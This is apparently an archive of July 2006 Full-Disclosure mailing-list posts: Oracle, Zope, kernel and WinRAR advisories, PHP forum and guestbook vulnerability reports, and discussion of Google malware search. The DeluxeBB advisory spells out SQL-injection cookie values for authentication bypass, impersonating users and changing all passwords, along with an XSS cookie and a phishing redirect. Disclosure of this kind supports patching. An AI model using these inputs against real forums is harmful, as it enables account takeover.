Name SQL Injection in package SYS.DBMS_STATS (6980751) [DB21] Systems Oracle 10g Release 1 SeverityHigh Risk CategorySQL Injection Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Advisory18 Jul 2006 (V 1.00) Advisory http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_ stats.html Details ### The package SYS.DBMS_STATS contains a SQL injection vulnerability. Oracle fixed these vulnerabilities with the package dbms_assert. To exploit this vulnerability it is necessary to have the privilege to create a PL/SQL-function. Patch Information # Apply the patches for Oracle CPU July 2006 on top of Oracle 10g Release 1. History ### 01-nov-2005 Oracle secalert was informed 02-nov-2005 Oracle secalert asked for an exploit 18-jul-2006 Oracle published CPU July 2006 [DB21] 18-jul-2006 Advisory published Additional Information ## An analysis of the Oracle CPU July 2006 is available here http://www.red-database-security.com/advisory/oracle_cpu_july_2006.html This document will be updated during the next few days and weeks with the latest information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle Database - SQL Injection in SYS.DBMS_UPGRADE [DB22]
Name SQL Injection in package SYS.DBMS_UPGRADE (6980717) [DB22] Systems Oracle 10g Release 1 SeverityHigh Risk CategorySQL Injection Vendor URL http://www.oracle.com/ Author Alexander Kornbrust (ak at red-database-security.com) Advisory18 Jul 2006 (V 1.00) Advisory http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_ upgrade.html Details ### The package SYS.DBMS_UPGRADE contains a SQL injection vulnerability. Oracle fixed these vulnerabilities with the package dbms_assert. To exploit this vulnerability it is necessary to have the privilege to create a PL/SQL-function. Patch Information # Apply the patches for Oracle CPU July 2006 on top of Oracle 10g Release 1. History ### 01-nov-2005 Oracle secalert was informed 02-nov-2005 Oracle secalert asked for an exploit 18-jul-2006 Oracle published CPU July 2006 [DB22] 18-jul-2006 Advisory published Additional Information ## An analysis of the Oracle CPU July 2006 is available here http://www.red-database-security.com/advisory/oracle_cpu_july_2006.html This document will be updated during the next few days and weeks with the latest information. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] [SECURITY] [DSA 1113-1] New zope2.7 packages fixinformation disclosure
Done Joseph Pierini, CISSP | Director, Enterprise Services ScanAlert ( www.scanalert.com) -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Moritz Muehlenhoff Sent: Tuesday, July 18, 2006 2:22 PM To: debian-security-announce@lists.debian.org Subject: [Full-disclosure] [SECURITY] [DSA 1113-1] New zope2.7 packages fixinformation disclosure * PGP Signed by an unknown key: 07/18/2006 at 02:20PM -- Debian Security Advisory DSA 1113-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 18th, 2006 http://www.debian.org/security/faq -- Package: zope2.7 Vulnerability : programming error Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-3458 Debian Bug : 377277 It was discovered that the Zope web application server allows read access to arbitrary pages on the server, if a user has the privilege to edit "restructured text" pages. For the stable distribution (sarge) this problem has been fixed in version 2.7.5-2sarge2. The unstable distribution (sid) does no longer contain Zope 2.7 packages. We recommend that you upgrade your zope2.7 package. Upgrade Instructions wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge Source archives: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 .dsc Size/MD5 checksum: 906 e23c6dc88c7af48940e86fa41f97d536 http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 .diff.gz Size/MD5 checksum:51266 a30c65b102a2ae75eb8e953826ec397b http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5.orig.ta r.gz Size/MD5 checksum: 2885871 5b5c5823c62370d9f7325c6014a49d8b Alpha architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 _alpha.deb Size/MD5 checksum: 2669594 3012b1b7c60fbaa2a4e28270d8524993 AMD64 architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 _amd64.deb Size/MD5 checksum: 2661200 a2396ea45bdee6684526e50bbd91d407 ARM architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 _arm.deb Size/MD5 checksum: 2615998 94eba92b3e764b1409d9f204752c145d Intel IA-32 architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 _i386.deb Size/MD5 checksum: 2608476 0d2255ee8404c285df5d218ff1720ca1 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 _ia64.deb Size/MD5 checksum: 2959536 3f930a43af8b566f3ea791d7dd37b5cd HP Precision architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 _hppa.deb Size/MD5 checksum: 2736776 55734b807c8b20f65e6e0df0e2e27820 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 _m68k.deb Size/MD5 checksum: 2601508 29c0606574cb83e54d8df984e0a45b25 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 _mips.deb Size/MD5 checksum: 2675708 d48d0ef186ac908b5ab29c930e12dcb7 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 _mipsel.deb Size/MD5 checksum: 2678350 2f8078005091cea22255944c8f5d0953 PowerPC architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 _powerpc.deb Size/MD5 checksum: 2724040 ea43d949c6e6d8970d58088dc112bc78 IBM S/390 architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 _s390.deb Size/MD5 checksum: 2663274 140d55d68fdcbe8397f3d0ec13087f7e Sun Sparc architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2 _sparc.deb Size/MD5 checksum: 2670674 cbdb9f302896fd372cd583be41a8ec2a These files will probably be moved into the stable distribution on its next update. - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show
[Full-disclosure] [SECURITY] [DSA 1113-1] New zope2.7 packages fix information disclosure
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1113-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff July 18th, 2006 http://www.debian.org/security/faq - -- Package: zope2.7 Vulnerability : programming error Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-3458 Debian Bug : 377277 It was discovered that the Zope web application server allows read access to arbitrary pages on the server, if a user has the privilege to edit "restructured text" pages. For the stable distribution (sarge) this problem has been fixed in version 2.7.5-2sarge2. The unstable distribution (sid) does no longer contain Zope 2.7 packages. We recommend that you upgrade your zope2.7 package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2.dsc Size/MD5 checksum: 906 e23c6dc88c7af48940e86fa41f97d536 http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2.diff.gz Size/MD5 checksum:51266 a30c65b102a2ae75eb8e953826ec397b http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5.orig.tar.gz Size/MD5 checksum: 2885871 5b5c5823c62370d9f7325c6014a49d8b Alpha architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2_alpha.deb Size/MD5 checksum: 2669594 3012b1b7c60fbaa2a4e28270d8524993 AMD64 architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2_amd64.deb Size/MD5 checksum: 2661200 a2396ea45bdee6684526e50bbd91d407 ARM architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2_arm.deb Size/MD5 checksum: 2615998 94eba92b3e764b1409d9f204752c145d Intel IA-32 architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2_i386.deb Size/MD5 checksum: 2608476 0d2255ee8404c285df5d218ff1720ca1 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2_ia64.deb Size/MD5 checksum: 2959536 3f930a43af8b566f3ea791d7dd37b5cd HP Precision architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2_hppa.deb Size/MD5 checksum: 2736776 55734b807c8b20f65e6e0df0e2e27820 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2_m68k.deb Size/MD5 checksum: 2601508 29c0606574cb83e54d8df984e0a45b25 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2_mips.deb Size/MD5 checksum: 2675708 d48d0ef186ac908b5ab29c930e12dcb7 Little endian MIPS architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2_mipsel.deb Size/MD5 checksum: 2678350 2f8078005091cea22255944c8f5d0953 PowerPC architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2_powerpc.deb Size/MD5 checksum: 2724040 ea43d949c6e6d8970d58088dc112bc78 IBM S/390 architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2_s390.deb Size/MD5 checksum: 2663274 140d55d68fdcbe8397f3d0ec13087f7e Sun Sparc architecture: http://security.debian.org/pool/updates/main/z/zope2.7/zope2.7_2.7.5-2sarge2_sparc.deb Size/MD5 checksum: 2670674 cbdb9f302896fd372cd583be41a8ec2a These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (GNU/Linux) iD8DBQFEvVCnXm3vHE4uyloRAlQ2AJ9jb+33gTkXw9uR2dpWFbjY6vPU2QCfUNQ9 httpW0iB9j8ethB8nAad83w= =P+hr -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disc
[Full-disclosure] Advisory : DeluxeBB mutiple vulnerabilities
==
Advisory : DeluxeBB mutiple vulnerabilities
Release Date : July 18th, 2006
Application : DeluxeBB
Version : Deluxe 1.07 and previous versions
Platform : PHP
Vendor URL : http://www.deluxebb.com/
Authors : Jessica Hope ([EMAIL PROTECTED])
: Th3 M0ths ([EMAIL PROTECTED])
===
Overview
Due to various failures in sanitising user input, it is possible to
construct XSS attacks, SQL injection, authentication bypass, bypassing
of default security checks, user spoofing, cookie poisoning and
pollution of the global namespace.
===
Discussion
Authentication bypass:
It is possible for an attacker to become any user he or she wishes by
creating a set of fake cookies. Consider the admin with memberid of 1
and the name 'admin'. Here is the relevant settings required to become
this user:
membercookie: admin
memberid: 1
memberpw: ' or '' = '
The exploit works because the SQL query done looks something like this:
SELECT * FROM deluxebb_users WHERE (uid='1' && username='admin' &&
pass='' or '' = '')
There are limits imposed on the memberpw, it must be shorter than 33 characters.
However, memberpw should only contain the MD5 sum of your password
(something that should actually be changed, but that is a different section of
this report).
User spoofing:
It is possible to post as any other user without having to totally
become that user. The method
is nearly the same as above, except you do not need to alter the
password cookie. You will remain
logged in as the user you originally logged in as.
Consider the user 'test' with the memberid of 4. Here is the relevant
settings required to spoof this user:
memberid: 4
membercookie: ' or '' = '
All other cookies should be left alone.
You do not need to be logged in to launch this attack, you just need
to create the above cookies,
and provide anything for the memberpw cookie (even a - will suffice).
In addition to altering the cookies, if you were to register as a user
with just a single space as
the username, you would have the credentials, without the memberpw
cookie being set. You are
now able to post as a guest user, while still having the other
cookies. In addition to this, it is not
possible to ban by username; the user cannot be found in the admin cp.
Cookie poisioning:
If you set you cookies to the following, after logging in:
membercookie: ' or '' = '
Leaving the rest alone, you are able to change everyone's settings.
This can be done by then
going to the Member CP and changing anything. The result of this means
that you are able to
change everyone's e-mail, signature, location, website, other
settings, and worst of all, you are
able to change everyone's password.
XSS in membercookie cookie:
Setting the membercookie cookie to be any XSS causes the display forum
and display topic to
show the XSS as DeluxeBB trusts the membercookie over the memberid
which gets passed
through an intval() in $memberid = @intval($memberid);.
The membercookie looks like this:
membercookie: alert(document.cookie)
You do have to have a valid memberpw and memberid cookie.
URL Redirection on login:
In the redirect variable, it is possible to phish a user when they
attempt to login.
http://www.example.com/deluxebb/misc.php?sub=login&redirect=http://www.badsite.com/
Bypass SQL Injection Protection:
There is basic SQL Injection protection on certain variables such as
login. However, it
is programmed to be case sensitive, so bypassing the sensitivity can lead to
SQL Injection.
The protection is an strstr (case-sensitive) on UNION SELECT. Using
union select instead
in the protected variables is a simple bypass.
SQL Injection:
Due to the way the cookies are used, most of the above attacks
(authentication bypass, user spoofing, cookie poisoning) allow a basic
set of SQL injection.
More advanced SQL injection could be possible due to the way the
cookies are handled. I will
leave this as an exercise to the reader in order to come up with some
possible SQL.
Pollution of the global namespace:
Due to the following lines, it is possible to use cookies in an
attempt to overwrite data
in the $_GET, $_POST, $_SERVER and $_ENV arrays:
$list = array('_GET', '_POST', '_ENV', '_SERVER', '_COOKIE', '_FILES');
foreach($list as $element) {
if(!empty($$element) && is_array($$element) ) {
extract($$element);
}
}
This can allow someone to set a COOKIE variable to overwrite the
previous variables, allowing
SQL injection and XSS.
===
Solution
Anyone using DeluxeBB is advised to update to the latest version,
which at time of writing this is now v1.08
===
History:
18th July 2006: Full disclosure
15th July 2006: Vendor released pat
[Full-disclosure] hdweGUEST <= 2.1.1 Cross Site Scripting Vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Advisory: hdweGUEST <= 2.1.1 Cross Site Scripting Vulnerabilities
Release Date: 2006/07/18
Last Modified: 2006/07/18
Author: Tamriel [tamriel at gmx dot net]
Application: hdweGUEST 2.1.1
Risk: Low
Vendor Status: contacted | no reply | no patch available
Vendor Site: www.huttenlocher-webdesign.de
Overview:
Quote from www.huttenlocher-webdesign.de
"hwdeGUEST ist ein Gaestebuch geschrieben in PHP. Es bietet dem
Betreiber eine Vielzahl von Moeglichkeiten"
Details:
In the new_entry.php are some possible cross site scripting
vulnerabilities.
This can be used to insert malicious code that will be executed
on the client's machine.
All user inputs are not checked by the script, only in this lines
(arround line 250-255)
...
$username=trim($username);
$usernachricht=trim($usernachricht);
if($GLOBALS[html_allowed]==0)
{$usernachricht=strip_tags($usernachricht);}
...
and the mail input is checked by this function:
(arround line 70-80)
...
if(strstr($adresse,"@"))
{
$temp_adresse=explode("@",$adresse);
if(strstr($temp_adresse[1],"."))
{
if(strlen($adresse)<8)
{return false;}
else
{return true;}
}
else
{return false;}
}
...
Proof of Concept:
Insert HTML/JS Code like "name" into the name input field
on "new entry" page.
Solution/Note:
It is strongly recommended to update your script by yourself.
Use the htmlentities() function and replace some insecure functions
like the checke_email()'s one with proper code.
Greets:
Greets fly out to all people at bluegeek.de
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.3 (MingW32)
iD8DBQFEvUI/qBhP+Twks7oRAtFJAJ9k0MmdJAK5MpVKQgaZ4QWYNHMwEwCdGBWI
lUwgqJqWD3UUsUzRJ0icwPA=
=/jUS
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2006:124 ] - Updated kernel packages fix privilege escalation vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2006:124 http://www.mandriva.com/security/ ___ Package : kernel Date: July 18, 2006 Affected: 2006.0, Corporate 3.0, Multi Network Firewall 2.0 ___ Problem Description: A race condition in the Linux kernel 2.6.17.4 and earlier allows local users to obtain root privileges due to a race condition in the /proc filesystem. The provided packages are patched to fix these vulnerabilities. All users are encouraged to upgrade to these updated kernels immediately and reboot to effect the fixes. To update your kernel, please follow the directions located at: http://www.mandriva.com/en/security/kernelupdate ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3626 ___ Updated Packages: Mandriva Linux 2006.0: e3f50de9b2576f6c7849efee5fa7ccc4 2006.0/RPMS/kernel-2.6.12.24mdk-1-1mdk.i586.rpm ac091b0d6eafcf2f2cbcb981bc7f1567 2006.0/RPMS/kernel-BOOT-2.6.12.24mdk-1-1mdk.i586.rpm 241c8edfd46c8a1af69c97346738715f 2006.0/RPMS/kernel-i586-up-1GB-2.6.12.24mdk-1-1mdk.i586.rpm 2652cbf99438921d4dd473284173d83a 2006.0/RPMS/kernel-i686-up-4GB-2.6.12.24mdk-1-1mdk.i586.rpm 96eed9404633064ac54247bfaf79e6b0 2006.0/RPMS/kernel-smp-2.6.12.24mdk-1-1mdk.i586.rpm 2ebc8c0f8080712c943aadbe34c955a7 2006.0/RPMS/kernel-source-2.6.12.24mdk-1-1mdk.i586.rpm f4380595eb6fa81429f56706cdd32c55 2006.0/RPMS/kernel-source-stripped-2.6.12.24mdk-1-1mdk.i586.rpm 2477f821e4f1351013c3b8f941a8c18d 2006.0/RPMS/kernel-xbox-2.6.12.24mdk-1-1mdk.i586.rpm 79605a820271776ad7c01ba93e5707dd 2006.0/RPMS/kernel-xen0-2.6.12.24mdk-1-1mdk.i586.rpm 2af343ed6022e305de43b6c6d6771e97 2006.0/RPMS/kernel-xenU-2.6.12.24mdk-1-1mdk.i586.rpm e4a10a2ed21c36c4c36a4555b6a79433 2006.0/SRPMS/kernel-2.6.12.24mdk-1-1mdk.src.rpm Mandriva Linux 2006.0/X86_64: 87c2a427fc462c4b274f1d31d8030ca3 x86_64/2006.0/RPMS/kernel-2.6.12.24mdk-1-1mdk.x86_64.rpm 1d3f71f5bff6761b76e659089f1dd04f x86_64/2006.0/RPMS/kernel-BOOT-2.6.12.24mdk-1-1mdk.x86_64.rpm 56075fe597ff1b28fe73c76463cb057e x86_64/2006.0/RPMS/kernel-smp-2.6.12.24mdk-1-1mdk.x86_64.rpm 194ab270414b5e83d57205f423ae10a8 x86_64/2006.0/RPMS/kernel-source-2.6.12.24mdk-1-1mdk.x86_64.rpm 087efaca0ebc4274884f7811b168358d x86_64/2006.0/RPMS/kernel-source-stripped-2.6.12.24mdk-1-1mdk.x86_64.rpm e4a10a2ed21c36c4c36a4555b6a79433 x86_64/2006.0/SRPMS/kernel-2.6.12.24mdk-1-1mdk.src.rpm Corporate 3.0: 11825513fe1c738bf6ec48eed5c62807 corporate/3.0/RPMS/kernel-2.6.3.33mdk-1-1mdk.i586.rpm 169b6d012e5d003ee55c730335968257 corporate/3.0/RPMS/kernel-BOOT-2.6.3.33mdk-1-1mdk.i586.rpm 9958b7e383199559c7d10ce9a2b908a1 corporate/3.0/RPMS/kernel-enterprise-2.6.3.33mdk-1-1mdk.i586.rpm 4bfc5af3a33bbd068d5ec7530ebc986f corporate/3.0/RPMS/kernel-i686-up-4GB-2.6.3.33mdk-1-1mdk.i586.rpm 3d3aba1eafca57c61b2e13003aa13120 corporate/3.0/RPMS/kernel-p3-smp-64GB-2.6.3.33mdk-1-1mdk.i586.rpm 2a6f8c6c36eb3d9c94b24c0e12deb8ac corporate/3.0/RPMS/kernel-secure-2.6.3.33mdk-1-1mdk.i586.rpm f7cd743bde04b4604f20178e84085829 corporate/3.0/RPMS/kernel-smp-2.6.3.33mdk-1-1mdk.i586.rpm 8b0522f993b6aa19c90d45898b1359fa corporate/3.0/RPMS/kernel-source-2.6.3-33mdk.i586.rpm a608bd9be549327e59f8d61d83516d26 corporate/3.0/RPMS/kernel-source-stripped-2.6.3-33mdk.i586.rpm cfe5332861963310091c7fca6c81881e corporate/3.0/SRPMS/kernel-2.6.3.33mdk-1-1mdk.src.rpm Corporate 3.0/X86_64: 5602ec8c0a742c57e7b5c426e08972eb x86_64/corporate/3.0/RPMS/kernel-2.6.3.33mdk-1-1mdk.x86_64.rpm 6fda1cf0adebaa87c362e583a449ea97 x86_64/corporate/3.0/RPMS/kernel-BOOT-2.6.3.33mdk-1-1mdk.x86_64.rpm 690f4bc5987e923f110b0224b7d18c6f x86_64/corporate/3.0/RPMS/kernel-secure-2.6.3.33mdk-1-1mdk.x86_64.rpm ad947e405b1ec2d169f6d8e6f0be949a x86_64/corporate/3.0/RPMS/kernel-smp-2.6.3.33mdk-1-1mdk.x86_64.rpm deaf89ce9c2a2ab6ca66fcc9563eb5bc x86_64/corporate/3.0/RPMS/kernel-source-2.6.3-33mdk.x86_64.rpm 7a13854690a641b7257231d574895de2 x86_64/corporate/3.0/RPMS/kernel-source-stripped-2.6.3-33mdk.x86_64.rpm cfe5332861963310091c7fca6c81881e x86_64/corporate/3.0/SRPMS/kernel-2.6.3.33mdk-1-1mdk.src.rpm Multi Network Firewall 2.0: 8f589cb12460747b38d715968cf15c21 mnf/2.0/RPMS/kernel-2.6.3.33mdk-1-1mdk.i586.rpm c94f96a4467b6241789100a7dd942dcd mnf/2.0/RPMS/kernel-i686-up-4GB-2.6.3.33mdk-1-1mdk.i586.rpm 3c58da2c8bca7299dabf713a2c5d3b18 mnf/2.0/RPMS/kernel-p3-smp-64GB-2.6.3.33mdk-1-1mdk.i586.rpm ee74fbe17f8af2c2d6c4396094e4477e mnf/2.0/RPMS/kernel-secure-2.6.3.33mdk-1-1mdk.i586.rpm 5b1d9a2e52f4264b5d85514a958a092a mnf/
[Full-disclosure] Re: corporate uses for Google malware finding, etc. [was: [funsec] more than just malware..]
On 7/18/06, Gadi Evron <[EMAIL PROTECTED]> wrote: A couple more notes... This can have significant uses for corporations. For example, finding lost source code by using the filetype: feature, or as Dude already mentioned on this thread, to find wrongly named executables. Also, using the site: feature can help corporations search their websites for executables for potential AUP violations or compromises. Really, the sky is the limit even if this is not the holy grail. It's... cool. It would be even cooler if we had an engine that ignored the robots.txt and just indexed everything tho. I find that malware sites dont do well in PageRank ;-) -JP ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Outpost Firewall Pro secrately fixing security flaws?
To my knowledge Outpost Firewall Pro 3.5.631 had a security issue (say: 0-day) that An exception can be passed & then triggered by a local system user to the firewall resulting in a SYSTEM CRASH due to a overflow flaw in filtnt.sys (firewall driver) I was testing it on winxpsp2 (patchlevel latest) & other possibilities of remote exploitation. try experimenting with: cmd.exe c:\> mshta.exe longg string After upgrading to Outpost Firewall Pro ver. 3.51.759.6511 (462) the issue seems fixed. so secret fix huh ? --- Bipin Gautam http://bipin.tk Zeroth law of security: The possibility of poking a system from lower privilege is zero unless & until there is possibility of direct, indirect or consequential communication between the two... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] anoNet: Cooperative Chaos
http://www.anonet.org Forbidden You don't have permission to access /index.html on this server. Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. Apache/1.3.36 Server at www.anonet.org Port 80 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] corporate uses for Google malware finding, etc. [was: [funsec] more than just malware..]
A couple more notes... This can have significant uses for corporations. For example, finding lost source code by using the filetype: feature, or as Dude already mentioned on this thread, to find wrongly named executables. Also, using the site: feature can help corporations search their websites for executables for potential AUP violations or compromises. Really, the sky is the limit even if this is not the holy grail. It's... cool. Gadi. On Tue, 18 Jul 2006, Gadi Evron wrote: > Guys, HD and the guys at Websense are obviously very cool for noting this > Google hacking technique and exploiting it (HD publicly). > > Still, this thing can be used far and wide.. a lot more than just for > known signatures of malware, etc. > I was lucky enough to be playing with this for a bit before Websense went > completely public and HD made it public, so I came up with a few more > possibilities... > Also, I have cool friends who played with this and gave me some ideas > too! :) > > A few examples I gave in my blog on this, inspired by Websense and then > HD's new tool, is to look for other signatures rather than just known > stuff. > > For example, looking for UPX packers results in almost 10K suspect > samples: > signature: 4550 UPX1 > > The PE binary part, and then the UPX section named UPX1. > > Trying other combinations, possibly along with the filetype: feature, can > result in many interesting findings other than known malware. How many > packers and protection systems are out there for starters? > > Also, tried any checks for open directory indexes? :) > > I wrote more about this on my blog at securiteam: > http://blogs.securiteam.com/index.php/archives/513 > > Gadi. > > ___ > Fun and Misc security discussion for OT posts. > https://linuxbox.org/cgi-bin/mailman/listinfo/funsec > Note: funsec is a public and open mailing list. > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] more than just malware.. [was: Google Malware Search]
Guys, HD and the guys at Websense are obviously very cool for noting this Google hacking technique and exploiting it (HD publicly). Still, this thing can be used far and wide.. a lot more than just for known signatures of malware, etc. I was lucky enough to be playing with this for a bit before Websense went completely public and HD made it public, so I came up with a few more possibilities... Also, I have cool friends who played with this and gave me some ideas too! :) A few examples I gave in my blog on this, inspired by Websense and then HD's new tool, is to look for other signatures rather than just known stuff. For example, looking for UPX packers results in almost 10K suspect samples: signature: 4550 UPX1 The PE binary part, and then the UPX section named UPX1. Trying other combinations, possibly along with the filetype: feature, can result in many interesting findings other than known malware. How many packers and protection systems are out there for starters? Also, tried any checks for open directory indexes? :) I wrote more about this on my blog at securiteam: http://blogs.securiteam.com/index.php/archives/513 Gadi. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Hustle -- RARLab's WinRAR stack overflow
As of 18.7.2006, a new advisory detailing a buffer overflow in WinRAR's LHA archive processing has been made public on the Hustle Labs website. Please visit http://www.hustlelabs.com/advisories.html for more information. -Ryan Smith ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: corporate uses for Google malware finding, etc. [was: [funsec] more than just malware..]
On Tue, 18 Jul 2006 09:26:12 CDT, Gadi Evron said: > This can have significant uses for corporations. For example, finding lost > source code by using the filetype: For bonus points, once you find your source, re-do the Google query *without* the site: restrictor and see how many more copies you find. It's sad when Google and every hacker and their pet llama have your source code, and you don't pgpUty5jSC1EB.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Professional PHP Tools Guestbook Multiple Vulnerabilities
Advisory: Professional PHP Tools Guestbook Multiple Vulnerabilities
Release Date: 2006/07/17
Last Modified: 2006/07/18
Author: Tamriel [tamriel at gmx dot net]
Application: Professional PHP Tools Guestbook
Risk: Medium
Vendor Status: contacted | updated version available
Vendor Site: www.php-tools.eu
Overview:
Quote from .php-tools.eu
"Dieses einfache Gaestebuch kann auf jedem Webspace
mit PHP 5 und MySQL Unterstuetzung installiert
werden. Es sind Smilies ein BBCode integriert.
HTML ist aus Sicherheitsgruenden deaktiviert. Dem
Webmaster steht eine einfache Webadministration
zur Verfügung, mit der er alle Eintraege bequem
verwalten kann. Er ist auch in der Lage eine oder
mehrere IP Adressen für das Gaestebuch zu sperren."
Details:
1) SQL Injection Vulnerability in class.php
(arround line 75-115)
...
$hidemail = $_POST['hidemail'];
...
mysql_query("INSERT INTO gbook ( name, mail, hidemail, datum, ip,
text ) VALUES ( '$name', '$mail', '$hidemail', '$date', '$ip',
'$text' ) ");
...
Here the programer forgot something to validate.
In the complete script you can found this vulnerabilities so i
mention only one example here.
2) SQL Injection Vulnerabilities in class.php
(arround line 250 and arround line 260)
...
$name = $_POST['name'];
$mail = $_POST['mail'];
$ip = $_POST['ip'];;
$text = $_POST['text'];
mysql_query("UPDATE gbook SET name='$name', mail='$mail',
ip='$ip', text='$text' WHERE id='$entry'");
...
mysql_query("DELETE FROM gbook WHERE id='$entry'");
include(config('tpl_dir').'/del.tpl');
...
As an admin you can insert enough SQL Code. Its not celver to
trust every person who has admin access.
Version note:
I havent found some information about the actual version of this
script, so take a look on the
md5 hashes of my proofed files:
9f3f1e28f6a449b51bda7f57d7cfbb48 class.php
c27de7365648eb554c3a4cab83895015 delcookie.php
faca302875997b345ab4912465df06e4 setcookie.php
Note:
1) You can found some other insecure handlings, like the
administration login in setcookie.php
...
include('config.php');
if ( md5(config('admin_pass')) == $_GET['pass'] )
{
setcookie('gbook', $_GET['pass'], time()+2419200);
}
...
Attackers can here easy brute the password.
2) delcookie.php
...
setcookie('gbook', $_COOKIE['gbook'], time()-2419200);
...
The logout handler does not overwrites the existence cookie, so
attackers can
read out (for example on shared computer systems) the admin's
password hash after logout.
Solution:
Use the php's mysql_real_escape_string, to call MySQL's library
function mysql_real_escape_string,
which prepends backslashes to the following characters: \x00, \n,
\r, \, ', " and \x1a.
